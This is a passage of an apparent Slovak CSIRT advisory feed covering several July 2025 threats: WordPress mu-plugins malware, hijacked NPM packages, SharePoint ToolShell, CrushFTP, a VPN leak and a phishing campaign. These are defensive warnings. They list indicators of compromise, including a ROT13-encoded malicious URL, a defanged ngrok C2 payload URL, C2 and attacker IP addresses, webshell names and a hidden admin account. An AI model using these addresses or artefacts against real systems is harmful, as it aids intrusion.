<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Prevádzkovateľ témy Alone odporúča používateľom okamžitú aktualizáciu na verziu 7.8.5</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-5394">https://nvd.nist.gov/vuln/detail/CVE-2025-5394</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-in-wordpress-alone-theme/">https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-in-wordpress-alone-theme/</a></li>



<li><a href="https://www.wiz.io/vulnerability-database/cve/cve-2025-5394">https://www.wiz.io/vulnerability-database/cve/cve-2025-5394</a></li>



<li><a href="https://thehackernews.com/2025/07/hackers-exploit-critical-wordpress.html">https://thehackernews.com/2025/07/hackers-exploit-critical-wordpress.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2624/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Upozorňujeme na phishingovú kampaň zneužívajúcu meno VŠZP</title>
		<link>/posts/2611</link>
					<comments>/posts/2611#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 29 Jul 2025 14:04:06 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[VšZP]]></category>
		<guid isPermaLink="false">/?p=2611</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/07/168403018_4245645345447723_265570337282777551_n-e1753797910449-1024x657.jpg" alt="" /></p>VJ CSIRT upozorňuje na pretrvávajúce útoky, ktoré sú cielené na poistencov Všeobecnej zdravotnej poisťovne. Tieto útoky sú vykonávané formou phishingových...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/07/168403018_4245645345447723_265570337282777551_n-e1753797910449-1024x657.jpg" alt="" /></p>
<p><strong>VJ CSIRT upozorňuje na pretrvávajúce útoky, ktoré sú cielené na poistencov Všeobecnej zdravotnej poisťovne. Tieto útoky sú vykonávané formou phishingových e-mailov s&nbsp;podvodnými odkazmi.</strong></p>



<p><strong>Opis činnosti:</strong></p>



<p>„Všeobecná zdravotná poisťovňa upozorňuje verejnosť na&nbsp;aktuálnu phishingovú kampaň, v&nbsp;rámci ktorej sa útočníci snažia zneužiť situáciu a&nbsp;dôveru poistencov. Podvodné e-maily informujú o&nbsp;údajnej&nbsp;„novej refundácii“&nbsp;a&nbsp;obsahujú odkaz na&nbsp;falošnú webovú stránku, ktorá sa na&nbsp;oficiálnu stránku zdravotnej poisťovne podobá. V&nbsp;prípade, ak vám takýto e-mail prišiel,&nbsp;je dôležité neklikať na&nbsp;odkaz v&nbsp;ňom a&nbsp;neposkytovať osobné ani platobné údaje.&nbsp;Odosielateľom týchto e-mailových správ nie je Všeobecná zdravotná poisťovňa.“&nbsp; &#8211; <a href="https://www.vszp.sk/o-nas/informacie-media/tlacove-spravy/vseobecna-zdravotna-poistovna-upozornuje-phisingovu-kampan-pozor-podvodne-emaily-neposkytujte-citlive-udaje.html">varuje VŠZP na svojom oficiálnom webe.</a></p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="449" height="533" src="/wp-content/uploads/2025/07/obrazok.png" alt="" class="wp-image-2612" style="width:438px;height:auto"/><figcaption class="wp-element-caption">dizajn phishingovej stránky</figcaption></figure></div>


<p><strong>Ako sa účinne brániť?</strong></p>



<p>Voči phishingovým kampaniam je najúčinnejšia obrana zvyšovanie povedomia používateľov. Útoky stratia účinnosť, pokiaľ dokážu zamestnanci a používatelia identifikovať&nbsp;podvodné správy a zneužité služby. Na to slúžia okrem varovaní najmä školenia a&nbsp;preventívne phishingové testy, kde sa používatelia naučia na konkrétnych príkladoch a&nbsp;v&nbsp;praxi rozlišovať legitímny a&nbsp;škodlivý obsah (screenshoty, škodlivé odkazy, hlavné rozlišovacie znaky, a podobne).</p>



<p>Takéto cvičenia ponúkame online aj verejnosti na stránke: <a href="https://ctf.kyberakademia.sk/">https://ctf.kyberakademia.sk/</a></p>



<p><p class="MsoNormal" style="mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;
line-height:normal"></p></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.vszp.sk/o-nas/informacie-media/tlacove-spravy/vseobecna-zdravotna-poistovna-upozornuje-phisingovu-kampan-pozor-podvodne-emaily-neposkytujte-citlive-udaje.html">https://www.vszp.sk/o-nas/informacie-media/tlacove-spravy/vseobecna-zdravotna-poistovna-upozornuje-phisingovu-kampan-pozor-podvodne-emaily-neposkytujte-citlive-udaje.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2611/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Škodlivý kód ukrytý do WordPress mu-plugins</title>
		<link>/posts/2602</link>
					<comments>/posts/2602#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 24 Jul 2025 14:46:39 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=2602</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>Útočníci v&#160;rámci techník skrývania škodlivého kódu využívajú zložku mu-plugins, ktorú používajú stránky na platforme WordPress pre načítanie automaticky aktivovaných modulov....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>
<p><strong>Útočníci v&nbsp;rámci techník skrývania škodlivého kódu využívajú zložku mu-plugins, ktorú používajú stránky na platforme WordPress pre načítanie automaticky aktivovaných modulov.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Webové stránky na platforme WordPress</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>Výskumníci spoločnosti Sucuri upozorňujú na trend, kedy útočníci zneužívajú zložku mu-plugins na ukrývanie škodlivého kódu. Táto zložka, ktorej názov je skratkou slov „must-use plugins“, slúži webovým stránkam na platforme WordPress ako zdroj automaticky aktivovaných modulov. Moduly nie sú zobrazované v&nbsp;administrátorskom rozhraní, teda zložka poskytuje lepšiu možnosť vyhnúť sa detekcii.</p>



<p>Spoločnosť pozorovala niekoľko odlišných prípadov infekcií. Jedným z nich bol škodlivý súbor „wp-index.php“, ktorý volal z URL obfuskovanej jednoduchou šifrou ROT13 ďalšie štádium infekcie, ktoré umožnilo útočníkovi trvalý prístup k infikovanej webstránke a vzdialené vykonávanie kódu PHP. V iných prípadoch útočníci infikovali zložku mu-plugin kódom pre presmerovanie na falošnú aktualizačnú stránku, zámenu obsahu webstránky (obrázky s explicitným obsahom a odkazy), či pre vytvorenie webshell-u.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Eskalácia oprávnení</strong></li>



<li><strong>Nedostupnosť služby (DoS)</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong><strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Vykonajte audit nainštalovaných modulov v&nbsp;prípade, že ste tak ešte nevykonali, aktualizujte ich na najnovšie verzie. Správne nastavte oprávnenia pre operácie so súbormi webstránky. Zakážte zmeny v súbore wp-config.php ( <code>define('DISALLOW_FILE_EDIT', true);</code> ).</p>



<p><strong>Indikátory kompromitácie:</strong></p>



<ul>
<li>Škodlivý súbor a cesta: wp-content/mu-plugins/wp-index.php</li>



<li>ROT13-kódované URL: str_rot13(&#8216;uggcf://1870l4ee4l3q1x757673d.klm/peba.cuc&#8217;)</li>



<li>Dekódovaná URL: hxxps://1870y4rr4y3d1k757673q[.]xyz/cron.php</li>



<li>Databázový kľúč: _hdra_core</li>



<li>Dočasná cesta k payloadu: .sess-[hash].php v&nbsp;zložke pre nahrávanie súborov</li>



<li>Skrytý používateľ s&nbsp;oprávneniami správcu: officialwp</li>
</ul>



<p><strong>Odkazy:</strong></p>



<p><a href="https://blog.sucuri.net/2025/07/uncovering-a-stealthy-wordpress-backdoor-in-mu-plugins.html">https://blog.sucuri.net/2025/07/uncovering-a-stealthy-wordpress-backdoor-in-mu-plugins.html</a></p>



<p><a href="https://blog.sucuri.net/2025/03/hidden-malware-strikes-again-mu-plugins-under-attack.html">https://blog.sucuri.net/2025/03/hidden-malware-strikes-again-mu-plugins-under-attack.html</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2602/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľná aplikácia ExpressVPN smeruje komunikáciu RDP mimo tunel</title>
		<link>/posts/2599</link>
					<comments>/posts/2599#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 24 Jul 2025 12:45:19 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ExpressVPN]]></category>
		<category><![CDATA[information disclosure]]></category>
		<guid isPermaLink="false">/?p=2599</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/07/expressvpn-1024x615.png" alt="" /></p>ExpressVPN vo svojej poslednej aktualizácii opravila chybu, ktorá spôsobuje, že komunikácia vedúca cez Remote Desktop Protocol neprechádza VPN tunelom. Zraniteľné...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/07/expressvpn-1024x615.png" alt="" /></p>
<p><strong>ExpressVPN vo svojej poslednej aktualizácii opravila chybu, ktorá spôsobuje, že komunikácia vedúca cez Remote Desktop Protocol neprechádza VPN tunelom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>ExpressVPN Windows klient verzie 12.97 až 12.101.0.2-beta</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p>Verzia 12 klienta ExpressVPN pre Windows obsahuje bezpečnostnú chybu, ktorá za určitých okolností zapríčiňuje neanonymizovanú komunikáciu mimo VPN tunel. Jedná sa o&nbsp;dve konkrétne situácie, a&nbsp;to pripojenie cez RDP a TCP premávku smerovanú cez port 3389. Týmto spôsobom môže internetový poskytovateľ alebo iný účastník siete vidieť adresu servera na ktorý sa používateľ pripája.</p>



<p>Chybu, ktorá súvisí so zabudnutou, neodstránenou časťou kódu z&nbsp;testovacej verzie, objavil a&nbsp;nahlásil bezpečnostný analytik Adam-X.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Úplné narušenie dôvernosti systému</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Dodávateľ služby odporúča aktualizáciu na verziu 12.101.0.45 ktorá mimo iných úprav obsahuje záplatu transparentného pripojenia.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.expressvpn.com/blog/expressvpn-rdp-leak-fixed/">https://www.expressvpn.com/blog/expressvpn-rdp-leak-fixed/</a></li>



<li><a href="https://thecyberexpress.com/expressvpn-fixes-windows-vpn-leak/">https://thecyberexpress.com/expressvpn-fixes-windows-vpn-leak/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/expressvpn-bug-leaked-user-ips-in-remote-desktop-sessions/">https://www.bleepingcomputer.com/news/security/expressvpn-bug-leaked-user-ips-in-remote-desktop-sessions/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2599/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť CrushFTP</title>
		<link>/posts/2588</link>
					<comments>/posts/2588#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 22 Jul 2025 15:41:06 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<guid isPermaLink="false">/?p=2588</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/04/crushFTP2.webp" alt="" /></p>Vývojári FTP klienta CrushFTP vydali aktualizáciu pre novú zero-day zraniteľnosť, ktorá je aktívne zneužívaná. Útočníkom umožňuje získať administrátorský prístup ku...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/04/crushFTP2.webp" alt="" /></p>
<p><strong>Vývojári FTP klienta CrushFTP vydali aktualizáciu pre novú zero-day zraniteľnosť, ktorá je aktívne zneužívaná. Útočníkom umožňuje získať administrátorský prístup ku zraniteľným zariadeniam.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>CrushFTP 11.3.4_23 a vyššie</li>



<li>CrushFTP 10.8.5 a vyššie</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-54309</strong>(CVSS 3.1 skóre 9.0)</p>



<p>Pokiaľ je služba DMZ proxy zakázaná, zraniteľné verzie CrushFTP nevykonávajú správne AS2 validáciu a&nbsp;dovolia útočníkom obísť autentifikáciu a získať prístup k&nbsp;účtu správcu cez protokol HTTPS. Útočník pre jej zneužitie potrebuje odoslať špeciálne upravenú požiadavku cez rozhranie HTTPS.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostných prvkov</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Používateľom zraniteľných FTP klientov odporúčame okamžitú aktualizáciu na verzie CrushFTP 11.3.4_26 a CrushFTP 10.8.5_12. Pokiaľ nie je možné z produkčných dôvodov vykonať okamžitú aktualizáciu, odporúčame preventívne obnovenie pôvodnej (základnej) konfigurácie z čistých záloh, čím zvrátite prípadnú kompromitáciu aplikácie. Zálohy možno považovať za nekompromitované, ak sú vytvorené pred 16. júlom – vrátane.</p>



<p>Medzi už známe znaky napadnutých systémov podľa spoločnosti SOCRadar patria:</p>



<ul>
<li>Zásahy do <em>MainUsers/default/user.xml </em>vrátane reťazca <em>“last_logins“.</em></li>



<li>Neznáme účty správcov s&nbsp;dlhými identifikátormi ako napríklad: 7a0d26089ac528941bf8cb998d97f408m</li>



<li>Zmeny v&nbsp;rozhraní ako napríklad chýbajúce tlačidlá či iné grafické prvky.</li>



<li>Prihlásenia správcov systému z&nbsp;neznámych IP adries.</li>



<li>Zmeny v&nbsp;oprávneniach spravovania citlivých adresárov.</li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.rapid7.com/blog/post/crushftp-zero-day-exploited-in-the-wild/">https://www.rapid7.com/blog/post/crushftp-zero-day-exploited-in-the-wild/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-54309">https://nvd.nist.gov/vuln/detail/CVE-2025-54309</a></li>



<li><a href="https://socradar.io/cve-2025-54309-new-crushftp-zero-day-exploited/">https://socradar.io/cve-2025-54309-new-crushftp-zero-day-exploited/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2588/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kompromitované balíčky NPM šíria malvér</title>
		<link>/posts/2585</link>
					<comments>/posts/2585#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 21 Jul 2025 15:19:08 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2585</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/07/npm-1024x655.png" alt="" /></p>Správca open-source NPM balíčkov pre Node.js uviedol na svojej GitHub stránke varovanie, že sa stal obeťou phishingového útoku. Útočníci vymenili...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/07/npm-1024x655.png" alt="" /></p>
<p><strong>Správca open-source NPM balíčkov pre Node.js uviedol na svojej GitHub stránke varovanie, že sa stal obeťou phishingového útoku. Útočníci vymenili jeho balíčky za škodlivé.</strong></p>



<p><strong>Infikované balíčky:</strong></p>



<ul>
<li>eslint-config-prettier verzia 8.10.1, 9.1.1, 10.1.6, a 10.1.7.</li>



<li>eslint-plugin-prettier verzia 4.2.2 and 4.2.3.</li>



<li>synckit verzia 0.11.9</li>



<li>@pkgr/core verzia 0.2.8</li>



<li>napi-postinstall verzia 0.3.1</li>
</ul>



<p><strong>Opis útoku:</strong></p>



<p><strong>node-gyp.dll</strong> (c68e42f416f482d43653f36cd14384270b54b68d6496a8e34ce887687de5b441</p>



<p>node-gyp.dll)</p>



<p>Úspešný phishingový útok dovolil útočníkom získať prístup k&nbsp;NPM tokenu správcu balíčkov a&nbsp;vykonať útok na dodávateľský reťazec. Útočník zverejnil podvrhnuté verzie balíčkov eslint-config-prettier, eslint-plugin-prettier, synckit, @pkgr/core a napi-postinstall. Obsahujú poinštalačný skript s funkciou <em>logDiskSpace();</em> ktorá sa pokúsi vykonať podvrhnutý trojanizovaný DLL súbor (node-gyp.dll), cez systémový proces <em>rundll32</em><strong>.&nbsp;</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Vzdialené vykonanie príkazov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame okamžite odinštalovať infikované verzie balíčkov, verifikovať „lockfiles“: <em>package-lock.json,&nbsp;pnpm-lock.yaml,&nbsp;bun.lock</em>&nbsp;alebo&nbsp;<em>yarn.lock </em>či neobsahujú referencie na tieto súbory a kontrolovať CI logy po 18. júli na záznamy nevyžiadanej aktivity.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.bleepingcomputer.com/news/security/popular-npm-linter-packages-hijacked-via-phishing-to-drop-malware/">https://www.bleepingcomputer.com/news/security/popular-npm-linter-packages-hijacked-via-phishing-to-drop-malware/</a></li>



<li><a href="https://thehackernews.com/2025/07/malware-injected-into-6-npm-packages.html">https://thehackernews.com/2025/07/malware-injected-into-6-npm-packages.html</a></li>



<li><a href="https://www.virustotal.com/gui/file/c68e42f416f482d43653f36cd14384270b54b68d6496a8e34ce887687de5b441/community">https://www.virustotal.com/gui/file/c68e42f416f482d43653f36cd14384270b54b68d6496a8e34ce887687de5b441/community</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2585/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zero-day zraniteľnosti Microsoft SharePoint Server</title>
		<link>/posts/2583</link>
					<comments>/posts/2583#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 21 Jul 2025 15:15:30 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[SharePoint]]></category>
		<guid isPermaLink="false">/?p=2583</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/SharePoint-Logo.wine_-1024x683.png" alt="" /></p>Spoločnosť Microsoft vydala bezpečnostné aktualizácie pre SharePoint Server, ktoré opravujú dve kritické aktívne zneužívané zraniteľnosti. CVE‑2025‑53770 a CVE‑2025‑53771 umožňujú vzdialené...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/SharePoint-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala bezpečnostné aktualizácie pre SharePoint Server, ktoré opravujú dve kritické aktívne zneužívané zraniteľnosti. CVE‑2025‑53770 a CVE‑2025‑53771 umožňujú vzdialené prevzatie kontroly nad servermi bez nutnosti prihlásenia. Chyby boli zneužité v útokoch proti desiatkam inštitúcií po celom svete.</strong><br><strong>[Aktualizované: 23.7.2025]</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SharePoint Subscription Edition</li>



<li>SharePoint 2019</li>



<li>SharePoint 2016</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-53770</strong><strong> (CVSS skóre 9,8)</strong></p>



<p>Kritická zraniteľnosť umožňuje neautorizovanému útočníkovi vzdialene vykonávať kód. Chyba súvisí s&nbsp;neošetrenou deserializáciou nedôveryhodných dát v&nbsp;lokálnej inštancii SharePoint Server.</p>



<p><strong>CVE-2025-53771</strong><strong> (CVSS skóre 6,3)</strong></p>



<p>Aktívne zneužívaná zraniteľnosť strednej závažnosti umožňuje autorizovanému útočníkov vykonávať útoky s&nbsp;falšovaním identity (spoofing) po sieti. Súvisí s&nbsp;nevhodnou kontrolou súborovej cesty k&nbsp;citlivým súborom.</p>



<p>Chyby boli zneužité v reálnych útokoch proti desiatkam vládnych, akademických a energetických inštitúcií po celom svete. Útočná kampaň bola nazvaná ToolShell.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong></strong><strong>Spoofing</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Microsoft vyzýva administrátorov, aby bezodkladne aktualizovali SharePoint 2016 [<a href="https://www.microsoft.com/en-us/download/details.aspx?id=108289" data-type="link" data-id="https://www.microsoft.com/en-us/download/details.aspx?id=108289">KB5002759</a>, <a href="https://www.microsoft.com/en-us/download/details.aspx?id=108288" data-type="link" data-id="https://www.microsoft.com/en-us/download/details.aspx?id=108288">KB5002760</a>], SharePoint 2019 [<a href="https://www.microsoft.com/en-us/download/details.aspx?id=108287">KB5002753</a>, <a href="https://www.microsoft.com/en-us/download/details.aspx?id=108286">KB5002754</a>] a SharePoint Subscription Edition [<a href="https://www.microsoft.com/en-us/download/details.aspx?id=108285">KB5002768</a>], zapli bezpečnostné funkcie ako AMSI a Defender AV, vymenili šifrovacie kľúče a preverili systémy na známky útoku. Pokiaľ nie je možné aktualizácie aplikovať, odporúča dočasne odpojiť servery z internetu alebo použiť dostupné ochranné opatrenia. Podrobný návod nájdete na oficiálnych stránkach<strong> </strong>[<a href="https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/">1</a>, <a href="https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/">2</a>]<strong>.</strong></p>



<p><strong>Indikátory kompromitácie:</strong></p>



<ul>
<li>Spinstall0.aspx (a variácie; webshell)</li>



<li>92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514 (SHA-256 súboru Spinstall0.aspx)</li>



<li>debug_dev.js (súbor s webovými konfiguračnými údajmi vrátane MachineKey)</li>



<li>c34718cbb4c6.ngrok-free[.]app/file.ps1 (URL pre tunel Ngrok pre spojenie s C2)</li>



<li>\1[5-6]\TEMPLATE\LAYOUTS\debug_dev.js (súborová cesta k ukradnutým webovým konfiguračným súborom)</li>



<li>131.226.2[.]6 (adresa C2 servera)</li>



<li>134.199.202[.]205 (adresa zneužívajúca dané zraniteľnosti)</li>



<li>104.238.159[.]149 (adresa zneužívajúca dané zraniteľnosti)</li>



<li>188.130.206[.]168 (adresa zneužívajúca dané zraniteľnosti)</li>
</ul>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-emergency-patches-for-sharepoint-rce-flaws-exploited-in-attacks/">https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-emergency-patches-for-sharepoint-rce-flaws-exploited-in-attacks/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-53770">https://nvd.nist.gov/vuln/detail/CVE-2025-53770</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-53771">https://nvd.nist.gov/vuln/detail/CVE-2025-53771</a></li>



<li><a href="https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/">https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/</a></li>



<li><a href="https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/">https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2583/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti zariadení Hewlett-Packard Enterprise Networking Instant On Access Point</title>
		<link>/posts/2581</link>
					<comments>/posts/2581#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 21 Jul 2025 15:13:47 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[HPE]]></category>
		<guid isPermaLink="false">/?p=2581</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Hewlett-Packard-Logo-1999-1024x576.png" alt="" /></p>Hewlett-Packard Enterprise (HPE) vydala bezpečnostné aktualizácie pre firmvér zariadení Networking Instant On Access Point, ktoré opravujú jednu kritickú a jednu...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Hewlett-Packard-Logo-1999-1024x576.png" alt="" /></p>
<p><strong>Hewlett-Packard Enterprise (HPE) vydala bezpečnostné aktualizácie pre firmvér zariadení Networking Instant On Access Point, ktoré opravujú jednu kritickú a jednu vysoko závažnú zraniteľnosť.</strong> <strong>CVE</strong><strong>‑</strong><strong>2025</strong><strong>‑</strong><strong>37103 súvisí s&nbsp;napevno kódovanými prihlasovacími </strong><strong>ú</strong><strong>dajmi a CVE-2025-37102 umožňuje vykonávať systémové príkazy.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>zariadenia HPE Networking Instant On Access Point s&nbsp;firmvérom verzie 3.2.0.1 a staršími</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-37103</strong><strong> (CVSS skóre 9,8)</strong></p>



<p>Napevno kódované prihlasovacie údaje umožňujú vzdialeným útočníkom získať administrátorský prístup k webovému rozhraniu zariadenia. Tým môžu meniť konfiguráciu, inštalovať zadné vrátka alebo odpočúvať sieť.</p>



<p><strong>CVE-2025-37102</strong><strong> (CVSS skóre 7,2)</strong></p>



<p>Zraniteľnosť umožňuje vzdialenému autentifikovanému útočníkovi injektovať ľubovoľné príkazy v konzole zraniteľného zariadenia a získať možnosť vykonávať príkazy na podkladovom systéme.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostných prvkov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia firmvéru zariadení HPE Networking Instant On Access Point aspoň na verziu 3.2.1.0.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04894en_us&amp;docLocale=en_US">https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04894en_us&amp;docLocale=en_US</a></li>



<li><a href="https://thehackernews.com/2025/07/hard-coded-credentials-found-in-hpe.html">https://thehackernews.com/2025/07/hard-coded-credentials-found-in-hpe.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2581/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>VJ CSIRT spolupracuje pri zásahu v Dnipre (Ukrajina) pre bombové hrozby na školách</title>
		<link>/posts/2568</link>
					<comments>/posts/2568#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 16 Jul 2025 10:56:43 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[NCODK]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2568</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>VJ CSIRT (v gescii Sekcie kybernetickej bezpečnosti MIRRI SR) sa aktívne podieľala na riešení mimoriadne závažného bezpečnostného incidentu v úzkej...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
